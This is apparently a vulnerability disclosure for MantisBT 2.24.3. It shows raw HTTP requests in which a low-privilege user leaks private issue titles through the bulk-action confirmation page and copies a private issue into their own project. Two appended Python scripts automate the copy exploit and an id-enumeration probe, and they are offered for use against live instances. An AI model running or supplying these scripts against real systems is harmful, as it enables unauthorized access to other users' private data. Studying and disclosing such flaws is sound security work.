### Attacker init
> This is just additional information; you can disregard this issue. But because of internet connection issues I noticed that when the attacker visits http://localhost/mantisbt/mantisbt-2.24.3/manage_proj_edit_page.php?project_id= the project title can be disclosed: it returns ``access denied``, but the dropdown for projects still renders the title of the project.
- There are two ways for the attacker to get started: reuse an old report of their own, or report a new issue. I will just create a new issue.
**Request**
```
POST /mantisbt/mantisbt-2.24.3/bug_report.php?posted=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------427049419225960153701985913573
Content-Length: 2423
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/bug_report_page.php
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=6%2C4%2C5%2C3%2C2
Upgrade-Insecure-Requests: 1
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="bug_report_token"
20200927Y7C9GOAmlETk2ohCgpLe0qIr2hRhYMgm
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="m_id"
0
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="project_id"
1
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="category_id"
1
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="reproducibility"
10
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="severity"
20
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="priority"
30
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="platform"
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="os"
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="os_build"
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="handler_id"
2
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="summary"
Hello I am the attacker
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="description"
Hello I am the attacker
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="steps_to_reproduce"
Hello I am the attacker
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="additional_info"
Hello I am the attacker
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="tag_string"
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="tag_select"
0
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="max_file_size"
5000000
-----------------------------427049419225960153701985913573
Content-Disposition: form-data; name="view_state"
10
-----------------------------427049419225960153701985913573--
```
**Response**
```
HTTP/1.1 200 OK
Date: Sat, 26 Sep 2020 23:34:54 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sat, 26 Sep 2020 23:34:54 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sat, 26 Sep 2020 23:34:54 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Vary: Accept-Encoding
Content-Length: 10525
Connection: close
Content-Type: text/html; charset=UTF-8
MantisBT
```
### Launch attack
- As manager, go to your issue [http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8](http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8)
- The two vulnerable functions here are ``Move`` and ``Delete``; let's start with the ``Move`` functionality.
**Normal request**
```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=6%2C4%2C5%2C3%2C2
Upgrade-Insecure-Requests: 1
bug_actiongroup_page_token=20200927VytbpqZq-H6AOMpwgFL3-510O_GESAhb&bug_arr%5B%5D=8&action=MOVE
```
- Just change ``bug_arr%5B%5D=8`` to ``bug_arr%5B%5D=7`` (a private issue the attacker is not allowed to view) and the confirmation page will render the summary/title of that issue.
- The ``Delete`` functionality is almost the same:
**Normal request**
```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/view.php?id=8
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=6%2C4%2C5%2C3%2C2
Upgrade-Insecure-Requests: 1
bug_actiongroup_page_token=202009278EV6inaVGOOm_NWIFfBv911-mp-b93-g&bug_arr%5B%5D=8&action=DELETE
```
- Note that you cannot actually move/delete these issues: the action returns ``You did not have appropriate permissions to perform that action.`` However, it is too late; the summary/title has already leaked on the confirmation page.
### Copying issues: For fun fun fun!
- In this part the attacker manages to **fully leak** a private issue.
- As the malicious actor, go to [http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd1cb80184](http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd1cb80184)
- You can see the ``Viewing issues`` section with the ``select all`` checkbox and an action dropdown.
- The problem in this dropdown is the ``Copy`` functionality.
> Note: I noticed that the ``Assigned to Me (Unresolved)`` view sends a different number of parameters; the ``bug_arr_all=all`` parameter is required. Select ``Assigned to Me (Unresolved)`` and compare it with ``Unassigned``, which doesn't send ``bug_arr_all=all``.
**Normal request**
```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd359dfcce
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=8
Upgrade-Insecure-Requests: 1
bug_arr%5B%5D=8&bug_arr_all=all&action=COPY
```
**Normal response**
```
HTTP/1.1 200 OK
Date: Sat, 26 Sep 2020 23:50:18 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sat, 26 Sep 2020 23:50:18 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sat, 26 Sep 2020 23:50:18 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Vary: Accept-Encoding
Content-Length: 11551
Connection: close
Content-Type: text/html; charset=UTF-8
MantisBT
```
- This lands on the ``bug_actiongroup_page.php`` confirmation page.
- Click ``Copy Issues``, but change ``bug_arr%5B%5D=8`` to ``bug_arr%5B%5D=7`` (the private issue) before the request is sent; ``project_id=1`` is the attacker's own project:
**Request**
```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=10%2C6%2C4%2C5%2C3%2C2
Upgrade-Insecure-Requests: 1
bug_actiongroup_COPY_token=202009271-2rIHMkDM1rpzJGjW1dFUysY9Sqp-5m&action=COPY&bug_arr%5B%5D=7&project_id=1
```
**Response**
```
HTTP/1.1 302 Found
Date: Sat, 26 Sep 2020 23:56:39 GMT
Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
X-Powered-By: PHP/7.1.33
Cache-Control: no-store, no-cache, must-revalidate
Last-Modified: Sat, 26 Sep 2020 23:56:39 GMT
Set-Cookie: MANTIS_collapse_settings=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
X-Content-Type-Options: nosniff
Expires: Sat, 26 Sep 2020 23:56:39 GMT
X-Frame-Options: DENY
Content-Security-Policy: default-src 'self'; frame-ancestors 'none'; style-src 'self' 'unsafe-inline'; script-src 'self'; img-src 'self' 'self' data:
Location: http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=utf-8
```
- The private issue is copied into the attacker's project (``project_id=1``) as a new issue the attacker can read, so we have finally leaked the full information of a private issue!
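The two-step copy flow above, as an added example that is not part of the original report or of MantisBT's own code. It assumes the paths from the report, a logged-in session cookie for the attacker, and that the confirmation page carries a hidden ``bug_actiongroup_COPY_token`` input in the ``<input type="hidden" name="..._token" value="...">`` layout (an assumption about the markup); the transport is passed in as a callable so the flow can be exercised offline with a fake ``send``:

```python
"""Copy a private MantisBT issue into an attacker-controlled project through
bug_actiongroup_page.php (select) -> bug_actiongroup.php (action=COPY).
Added example; not code from the report or from MantisBT."""
import re
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Dict, List, Optional, Tuple

# Base path from the report; change for another instance.
BASE = "http://localhost/mantisbt/mantisbt-2.24.3"


def encode(fields: List[Tuple[str, str]]) -> bytes:
    """x-www-form-urlencoded body; urlencode renders bug_arr[] as bug_arr%5B%5D."""
    return urllib.parse.urlencode(fields).encode()


def extract_token(html: str, form: str) -> Optional[str]:
    """Pull the per-form CSRF token. Assumption: it is rendered as
    <input type="hidden" name="<form>_token" value="...">."""
    m = re.search(r'name="%s_token"\s+value="([^"]+)"' % re.escape(form), html)
    return m.group(1) if m else None


def select_step(bug_id: int) -> Tuple[str, bytes]:
    """Step 1: the Copy group action as sent from view_all_bug_page.php."""
    return (f"{BASE}/bug_actiongroup_page.php",
            encode([("bug_arr[]", str(bug_id)), ("bug_arr_all", "all"), ("action", "COPY")]))


def copy_step(token: str, bug_id: int, project_id: int) -> Tuple[str, bytes]:
    """Step 2: the confirmation form, with the private bug id swapped in."""
    return (f"{BASE}/bug_actiongroup.php",
            encode([("bug_actiongroup_COPY_token", token), ("action", "COPY"),
                    ("bug_arr[]", str(bug_id)), ("project_id", str(project_id))]))


def http_send(cookie: str) -> Callable[[str, bytes], str]:
    """Real transport: POST with the attacker's session cookie. Redirects are not
    followed, so the 302 to view_all_bug_page.php is visible as the result."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, req, fp, code, msg, headers, newurl):
            return None
    opener = urllib.request.build_opener(NoRedirect)

    def send(url: str, body: bytes) -> str:
        req = urllib.request.Request(url, data=body, headers={
            "Cookie": cookie, "Content-Type": "application/x-www-form-urlencoded"})
        try:
            with opener.open(req) as resp:
                return resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:  # 3xx surfaces here once redirects are blocked
            return f"HTTP {err.code} Location: {err.headers.get('Location', '')}"
    return send


def copy_private_issue(send: Callable[[str, bytes], str], own_bug: int,
                       private_bug: int, target_project: int) -> Dict[str, object]:
    """Select the attacker's own issue to obtain a valid COPY token, then submit
    the private issue id with that token. Returns what was sent and received."""
    url1, body1 = select_step(own_bug)
    page = send(url1, body1)
    token = extract_token(page, "bug_actiongroup_COPY")
    if token is None:
        return {"ok": False, "reason": "no bug_actiongroup_COPY_token on confirmation page"}
    url2, body2 = copy_step(token, private_bug, target_project)
    return {"ok": True, "token": token, "copy_body": body2.decode(), "result": send(url2, body2)}
```

Against a live instance, ``copy_private_issue(http_send(cookie), own_bug=8, private_bug=7, target_project=1)`` reproduces the two requests above; an ``HTTP 302`` pointing at ``view_all_bug_page.php`` in ``result`` is the outcome the report shows, while ``Access Denied.`` or a missing token means the server rejected the swap.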
### It's too late
The following actions allow me to disclose the title; all of them go through ``bug_actiongroup_page.php``.
**This is the overall request; only the ``action`` value differs**
```
POST /mantisbt/mantisbt-2.24.3/bug_actiongroup_page.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt/mantisbt-2.24.3/view_all_bug_page.php?filter=5f6fd5c14a312
Cookie: MANTIS_collapse_settings=|attachment_preview_7:1|attachment_preview_7:0; MANTIS_VIEW_ALL_COOKIE=2; MANTIS_PROJECT_COOKIE=1; PHPSESSID=amqlo1b5cejja0rjrvjk8vds4j; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=rEq9ipn3NCRWL2fefbubCfjZKQyRpOu_SLoBQO28Z9aopWLrHqmqMiFn7Vx_BzwE; MANTIS_BUG_LIST_COOKIE=8
Upgrade-Insecure-Requests: 1
bug_arr%5B%5D=8&bug_arr_all=all&action=YOUR_ACTION
```
This section is titled "It's too late" because each of these actions is refused, but by then the summary has already leaked:
- move issues returns ``You did not have appropriate permissions to perform that action.``
- assign issues returns ``You did not have appropriate permissions to perform that action.``
- close issues returns ``You did not have appropriate permissions to perform that action.``
- delete issues returns ``You did not have appropriate permissions to perform that action.``
- resolve issues returns ``You did not have appropriate permissions to perform that action.``
- set sticky returns ``You did not have appropriate permissions to perform that action.``
- update priority returns ``You did not have appropriate permissions to perform that action.``
- update severity returns ``Access Denied.``
- update status returns ``You did not have appropriate permissions to perform that action.``
- update view returns ``You did not have appropriate permissions to perform that action.``
- add note returns ``Access Denied.``
- attach tags returns ``Attach permission denied.``
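The single-request probe that the Move/Delete section and the list above describe, generalised over the ``action`` value, as an added example that is not code from the report or from MantisBT. It assumes the paths in the report, a session cookie for a low-privilege account, that the confirmation page renders each selected issue as a ``view.php?id=N`` link followed by a table cell holding its summary (the regex encodes that guess about the markup), and the refusal strings quoted above; the transport is a callable so the probe runs offline with a fake ``send``:

```python
"""Enumerate which issue ids leak a summary through bug_actiongroup_page.php:
the group-action confirmation page prints the selected issues' summaries even
though the action itself is later refused. Added example; not MantisBT code."""
import re
import urllib.parse
import urllib.request
from html import unescape
from typing import Callable, Dict, Iterable, List, Tuple

BASE = "http://localhost/mantisbt/mantisbt-2.24.3"  # path from the report

# Refusal strings the report quotes for the various group actions.
DENIALS = ("You did not have appropriate permissions to perform that action.",
           "Access Denied.",
           "Attach permission denied.")

# Assumed row layout on the confirmation page: an issue link followed by a
# cell holding the summary. Adjust if your instance's markup differs.
ROW = re.compile(r'view\.php\?id=(\d+)[^<]*</a>\s*</td>\s*<td[^>]*>(.*?)</td>', re.S)


def probe_request(bug_ids: Iterable[int], action: str = "MOVE") -> Tuple[str, bytes]:
    """The 'overall request' from the report: one bug_arr[] entry per id plus
    the action to preview (MOVE, DELETE, CLOSE, ...)."""
    fields: List[Tuple[str, str]] = [("bug_arr[]", str(b)) for b in bug_ids]
    fields += [("bug_arr_all", "all"), ("action", action)]
    return f"{BASE}/bug_actiongroup_page.php", urllib.parse.urlencode(fields).encode()


def leaked_summaries(html: str) -> Dict[int, str]:
    """id -> summary for every issue row the confirmation page rendered."""
    return {int(i): unescape(re.sub(r"<[^>]+>", "", s)).strip() for i, s in ROW.findall(html)}


def is_denied(html: str) -> bool:
    """True when the response carries one of the refusal messages."""
    return any(d in html for d in DENIALS)


def http_send(cookie: str) -> Callable[[str, bytes], str]:
    """Real transport: POST with the low-privilege account's session cookie."""
    def send(url: str, body: bytes) -> str:
        req = urllib.request.Request(url, data=body, headers={
            "Cookie": cookie, "Content-Type": "application/x-www-form-urlencoded"})
        with urllib.request.urlopen(req) as resp:
            return resp.read().decode("utf-8", "replace")
    return send


def enumerate_leak(send: Callable[[str, bytes], str], candidate_ids: Iterable[int],
                   action: str = "MOVE") -> Dict[int, Dict[str, object]]:
    """Probe ids one at a time and keep those whose summary shows up, noting
    whether the same response also carried a refusal (the 'too late' case)."""
    found: Dict[int, Dict[str, object]] = {}
    for bug_id in candidate_ids:
        url, body = probe_request([bug_id], action)
        page = send(url, body)
        for leaked_id, summary in leaked_summaries(page).items():
            found[leaked_id] = {"summary": summary, "denied": is_denied(page)}
    return found
```

Against a live instance, ``enumerate_leak(http_send(cookie), range(1, 50))`` lists every id whose title the account was shown; compare the result with what ``view.php?id=N`` returns for the same account to separate issues it can legitimately see from the ones that leaked.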